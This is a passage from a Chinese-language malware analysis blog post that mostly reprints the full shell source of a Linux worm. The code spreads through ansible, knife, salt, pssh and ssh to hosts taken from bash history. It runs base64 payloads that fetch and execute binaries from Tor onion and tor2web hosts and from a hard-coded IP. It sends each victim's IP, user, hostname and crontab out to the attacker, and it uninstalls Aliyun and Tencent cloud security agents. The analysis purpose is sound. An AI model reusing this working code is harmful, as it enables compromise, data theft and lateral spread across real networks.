ansible all -m shell -a 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash'
knife ssh 'name:*' 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash'
salt '*' cmd.run 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash'
pssh 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash'
hosts=$(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |grep -v ^127.|awk -F: {'print $2'}|sort|uniq)
for h in $hosts;do ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no -l root  $h 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash';done
for h in $hosts;do ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no -l $USER $h 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash';done
}

ibot() {
f=/bot
r=$(curl -4fsSLk ip.sb||wget -4qO- ip.sb||curl -4fsSLk checkip.amazonaws.com)_$(whoami)_$(uname -m)_$(uname -n)_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 -e$r $t.onion$f || $c -e$r $1$f
}

iscn() {
pkill -9 -f tracepath
f=/trc
x=./$(date|md5sum|cut -f1 -d-)
$c -x socks5h://$s:9050 $t.onion$f -o$x || $c $1$f -o$x
chmod +x $x;$x;rm -f $x
}

sockz
fexe
isys
issh &
ibot $t.tor2web.in || ibot $t.tor2web.it
iscn $t.tor2web.in || iscn $t.tor2web.it


这里面的 isys 试图卸载国内的的阿里云和腾讯云的 HIDS,但是却没有看到针对国外的厂商的 HIDS 的卸载程序。 这说明攻击者要么是国人,只了解国内的情况,要么攻击目标是国内的机器。

但是看到有很多篇英文的分析文章,说明这个攻击者还是要攻击国外的机器的。

那么为什么只卸载国内云服务器的 HIDS 呢,那我不知道了。

isys() { 
echo ZnVuY3Rpb24ga3VybCgpIHsKICByZWFkIHByb3RvIHNlcnZlciBwYXRoIDw8PCQoZWNobyAkezEvLy8vIH0pCiAgRE9DPS8ke3BhdGgvLyAvL30KICBIT1NUPSR7c2VydmVyLy86Kn0KICBQT1JUPSR7c2VydmVyLy8qOnKICBbWyB4IiR7SE9TVH0iID09IHgiJHtQT1JUfSIgXV0gJiYgUE9SVD04MAoKICBleGVjIDM8Pi9kZXYvdGNwLyR7SE9TVH0vJFBPUlQKICBlY2hvIC1lbiAiR0VUICR7RE9DfSBIVFRQLzEuMFxyXG5Ib3N0OiAke0hPU1R9XHJcblxyXG4iID4mMwogICh3aGlsZSByZWFkIGxpbmU7IGRvCiAgIFtbICIkbGluZSIgPT0gJCdccicgXV0gJiYgYnJlYWsKICBkb25lICYmIGNhdCkgPCYzCiAgZXhlYyAzPiYtCn0KCnJtIC1mICRIT01FL3NzCmN1cmwgLVYgfHwgd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vbW9wYXJpc3RoZWJlc3Qvc3RhdGljLWN1cmwvcmVsZWFzZXMvZG93bmxvYWQvdjcuNzUuMC9jdXJsLWFtZDY0IC1PICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApjdXJsIC1WIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvY3VybCA+ICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApzcyAtdiAgIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvc3MgICA+ICRIT01FL3NzO2NobW9kICt4ICRIT01FL3NzCnNzIC12ICAgfHwgY3VybCAtcyBodHRwOi8vMTM5LjU5LjE1MC43OjQ0My9zcyAtbyAkSE9NRS9zcztjaG1vZCAreCAkSE9NRS9zcwpwcyAgICAgIHx8IGN1cmwgLXMgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvcHMgLW8gJEhPTUUvcHM7Y2htb2QgK3ggJEhPTUUvcHMK|base64 -d|bash
crontab -l || yum -y install cron
crontab -l || yum -y install cronie
crontab -l || apt-get update && apt-get -y install cron
/usr/local/share/assist-daemon/assist_daemon --stop
/usr/local/share/assist-daemon/assist_daemon --delete
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/etc/init.d/aegis uninstall
systemctl stop aliyun
systemctl disable aliyun
systemctl start cron
systemctl enable cron
systemctl start crond
systemctl enable crond
rm -rf /usr/loca/qcloud/ /usr/local/aegis/ /usr/local/share/assist-daemon/ /usr/local/share/aliyun-assist/ /usr/sbin/aliyun-service /usr/sbin/aliyun_installer /etc/systemd/system/aliyun.service
}

issh函数通过 ssh横向移动。 如果机器上有已经配置好的 ansiblepsshsaltknife 等自动化运维工具,该恶意程序还会尝试利用他们进行横向移动。除此之外,攻击者还从 bash 的历史 ssh 记录里面尝试登录远程设备。

攻击者看起来是花了一些精力来研究如何绕过 HIDS 和 NIDS 的,恶意木马至今还有一部分是免杀的,此外还通过 IaC 工具扩大自己的战果,如此看来攻击者还是很厉害的,虽然没有做太多的对抗,但是他横向移动的技术值得红队人员学习 :)

分析大概就写这么多吧。

又是一篇流水账,没有重点,缺乏组织的意识流形式的文章。

我觉得这样不好,还得多学习学习怎样行文才能结构紧凑,言之有物。

看起来应该在本文的基础上修改几遍应该是可以改出来的。

不过吧,这不是写作业,没人评分,但是读者读起来可能比较费劲。

大段的代码,没有介绍基础知识,溯源思路没有表达清楚,大段的原始冗余重复的代码,缺乏图片描述,彼此关系不清,没有 Linux 基础的人可能很难看懂,能看懂的可能也很难坚持看这无聊的文章到结尾,最后此文可能就变成了我的备忘录 :(

想了想,我下次还是得认真思考一下怎么表达才能比较清楚了。

这一篇就算了,就写这样了吧。

哎,就是玩。

鸣谢:

  • 曾大佬
  • 矫哥

Les1ie

2021.7.12 18:43